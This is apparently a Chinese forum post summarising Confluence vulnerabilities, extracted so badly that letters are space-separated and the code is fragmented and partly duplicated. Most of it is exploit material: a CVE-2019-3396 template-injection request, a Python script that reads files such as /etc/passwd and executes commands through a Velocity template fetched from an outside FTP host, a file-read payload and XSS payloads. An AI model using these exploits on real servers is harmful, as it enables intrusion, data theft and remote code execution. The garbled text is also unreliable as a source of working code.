搜索

[18881] 2019-07-27_Confluence漏洞总结

文档创建者:s7ckTeam
浏览次数:16
最后更新:2025-01-18
2019-07-27_Confluence漏洞总结 C o n f l u e n c e c r h u a   h u a s e c   2 0 1 9 - 0 7 - 2 7 0 1 C o n f l u e n c e A t l a s s i a n w i k i 使 j i r a 0 2 1     1 . X . X 2 . X . X 3 . X . X 4 . X . X 5 . X . X                         6 . 0 . X 6 . 1 . X 6 . 3 . X 6 . 4 . X 6 . 5 . X                         6 . 6 . 1 2 6 . 6 . X                         6 . 7 . X 6 . 8 . X 6 . 9 . X 6 . 1 0 . X 6 . 1 1 . X                         6 . 1 2 . 3 6 . 1 2 . X                         6 . 1 3 . 3 6 . 1 3 . X                         6 . 1 4 . 2 6 . 1 4 . X p a y l o a d : e x p P O S T   / r e s t / t i n y m c e / 1 / m a c r o / p r e v i e w R e f e r e r :   u r l C o n t e n t - T y p e :   a p p l i c a t i o n / j s o n ;   c h a r s e t = u t f - 8 { " c o n t e n t I d " : " 7 8 6 4 5 7 " , " m a c r o " : { " n a m e " : " w i d g e t " , " b o d y " : " " , " p a r a m s " : { " u r l " : " h t t p s : / / w w w . v i d d l e r . c o m / v / 2 3 4 6 4 d c 5 " , " w i d t h " : " 1 0 0 0 " , " h e i g h t " : " 1 0 0 0 " , " _ t e m p l a t e " : " . . / w e b . x m l " } } } # c o d i n g :   u t f - 8 i m p o r t   r e i m p o r t   s y s i m p o r t   r e q u e s t s d e f   _ r e a d ( u r l ) :         r e s u l t   =   { }         f i l e n a m e   =   " . . / w e b . x m l "         # f i l e n a m e   =   ' f i l e : / / / / e t c / p a s s w d '         p a y l a o d   =   u r l   +   " / r e s t / t i n y m c e / 1 / m a c r o / p r e v i e w "         h e a d e r s   =   {                 " U s e r - A g e n t " :   " M o z i l l a / 5 . 0   ( X 1 1 ;   L i n u x   x 8 6 _ 6 4 ;   r v : 6 0 . 0 )   G e c k o / 2 0 1 0 0 1 0 1   F i r e f o x / 6 0 . 0 " ,                 " R e f e r e r " :   u r l   +   " / p a g e s / r e s u m e d r a f t . a c t i o n ? d r a f t I d = 1 2 3 4 5 & d r a f t S h a r e I d = 0 5 6 b 5 5 b c - f c 4 a - 4 8 7 b - b 1 e 1 - 8 f 6 7 3 f 2 8 0 c 2 3 & " ,                 " C o n t e n t - T y p e " :   " a p p l i c a t i o n / j s o n ;   c h a r s e t = u t f - 8 "         }         d a t a   =   ' { " c o n t e n t I d " : " 1 2 3 4 5 " , " m a c r o " : { " n a m e " : " w i d g e t " , " b o d y " : " " , " p a r a m s " : { " u r l " : " h t t p s : / / w w w . v i d d l e r . c o m / v / 2 3 4 6 4 d c 5 " , " w i d t h " : " 1 0 0 0 " , " h e i g h t " : " 1 0 0 0 " , " _ t e m p l a t e " : " % s " } } } '   %   f i l e n a m e
c m d . v m   使 h t t p s f t p h t t p 2   5 . 8 . 1 7 p a y l o a d : 3 X S S 5 . 2 / 5 . 8 . 1 4 / 5 . 8 . 1 5 p a y l o a d : ( 4 )     e r r o r   p a g e   X S S 3 . 4 . X p a y l o a d : h t t p s : / / b l o g . r i s k i v y . c o m / a t l a s s i a n - c o n f l u e n c e - r c e - c v e - 2 0 1 9 - 3 3 9 6 / h t t p s : / / e x p l o i t - d b . c o m /         d a t a   =   ' { " c o n t e n t I d " : " 1 2 3 4 5 " , " m a c r o " : { " n a m e " : " w i d g e t " , " b o d y " : " " , " p a r a m s " : { " u r l " : " h t t p s : / / w w w . v i d d l e r . c o m / v / 2 3 4 6 4 d c 5 " , " w i d t h " : " 1 0 0 0 " , " h e i g h t " : " 1 0 0 0 " , " _ t e m p l a t e " : " % s " } } } '   %   f i l e n a m e         r   =   r e q u e s t s . p o s t ( p a y l a o d ,   d a t a = d a t a ,   h e a d e r s = h e a d e r s )         #   p r i n t   r . c o n t e n t         i f   r . s t a t u s _ c o d e   = =   2 0 0   a n d   " w i k i - c o n t e n t "   i n   r . t e x t :                 m   =   r e . f i n d a l l ( ' . * w i k i - c o n t e n t " > n ( . * ) n                         < / d i v > n ' ,   r . t e x t ,   r e . S )                 r e t u r n   m [ 0 ] d e f   _ e x e c ( u r l , c m d ) :         r e s u l t   =   { }         f i l e n a m e   =   " f t p : / / 1 . 1 . 1 . 1 / c m d . v m "         p a y l a o d   =   u r l   +   " / r e s t / t i n y m c e / 1 / m a c r o / p r e v i e w "         h e a d e r s   =   {                 " U s e r - A g e n t " :   " M o z i l l a / 5 . 0   ( X 1 1 ;   L i n u x   x 8 6 _ 6 4 ;   r v : 6 0 . 0 )   G e c k o / 2 0 1 0 0 1 0 1   F i r e f o x / 6 0 . 0 " ,                 " R e f e r e r " :   u r l   +   " / p a g e s / r e s u m e d r a f t . a c t i o n ? d r a f t I d = 1 2 3 4 5 & d r a f t S h a r e I d = 0 5 6 b 5 5 b c - f c 4 a - 4 8 7 b - b 1 e 1 - 8 f 6 7 3 f 2 8 0 c 2 3 & " ,                 " C o n t e n t - T y p e " :   " a p p l i c a t i o n / j s o n ;   c h a r s e t = u t f - 8 "         }         d a t a   =   ' { " c o n t e n t I d " : " 1 2 3 4 5 " , " m a c r o " : { " n a m e " : " w i d g e t " , " b o d y " : " " , " p a r a m s " : { " u r l " : " h t t p : / / w w w . d a i l y m o t i o n . c o m / v i d e o / x c p a 6 4 " , " w i d t h " : " 3 0 0 " , " h e i g h t " : " 2 0 0 " , " _ t e m p l a t e " : " % s " , " c m d "         r   =   r e q u e s t s . p o s t ( p a y l a o d ,   d a t a = d a t a ,   h e a d e r s = h e a d e r s )         #   p r i n t   r . c o n t e n t         i f   r . s t a t u s _ c o d e   = =   2 0 0   a n d   " w i k i - c o n t e n t "   i n   r . t e x t :                 m   =   r e . f i n d a l l ( ' . * w i k i - c o n t e n t " > n ( . * ) n                         < / d i v > n ' ,   r . t e x t ,   r e . S )                 r e t u r n   m [ 0 ]           # s e t   ( $ e = " e x p " ) # s e t   ( $ a = $ e . g e t C l a s s ( ) . f o r N a m e ( " j a v a . l a n g . R u n t i m e " ) . g e t M e t h o d ( " g e t R u n t i m e " , n u l l ) . i n v o k e ( n u l l , n u l l ) . e x e c ( $ c m d ) ) # s e t   ( $ i n p u t = $ e . g e t C l a s s ( ) . f o r N a m e ( " j a v a . l a n g . P r o c e s s " ) . g e t M e t h o d ( " g e t I n p u t S t r e a m " ) . i n v o k e ( $ a ) ) # s e t ( $ s c   =   $ e . g e t C l a s s ( ) . f o r N a m e ( " j a v a . u t i l . S c a n n e r " ) ) # s e t ( $ c o n s t r u c t o r   =   $ s c . g e t D e c l a r e d C o n s t r u c t o r ( $ e . g e t C l a s s ( ) . f o r N a m e ( " j a v a . i o . I n p u t S t r e a m " ) ) ) # s e t ( $ s c a n = $ c o n s t r u c t o r . n e w I n s t a n c e ( $ i n p u t ) . u s e D e l i m i t e r ( " A " ) ) # i f ( $ s c a n . h a s N e x t ( ) )         $ s c a n . n e x t ( ) # e n d h t t p s : / / h o s t d o m a i n / s p a c e s / v i e w d e f a u l t d e c o r a t o r . a c t i o n ? d e c o r a t o r N a m e = P A Y L O A D P A Y L O A D = = >   f i l e : / / / / e t c / p a s s w d         ( l i n u x )                         f i l e : / / / C : / W i n o d o w s / w i n . i n i     ( w i n d o w s ) / r e s t / p r o t o t y p e / 1 / s e s s i o n / c h e c k / s o m e t h i n g < i m g % 2 0 s r c % 3 d a % 2 0 o n e r r o r % 3 d a l e r t % 2 8 d o c u m e n t . d o m a i n % 2 9 > / p a g e s / i n c l u d e s / s t a t u s - l i s t - m o % 3 C I F R A M E % 2 0 S R C % 3 D % 2 2 j a v a s c r i p t % 3 A a l e r t % 2 8 % 2 7 X S S % 2 7 % 2 9 % 2 2 % 3 E . v m
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理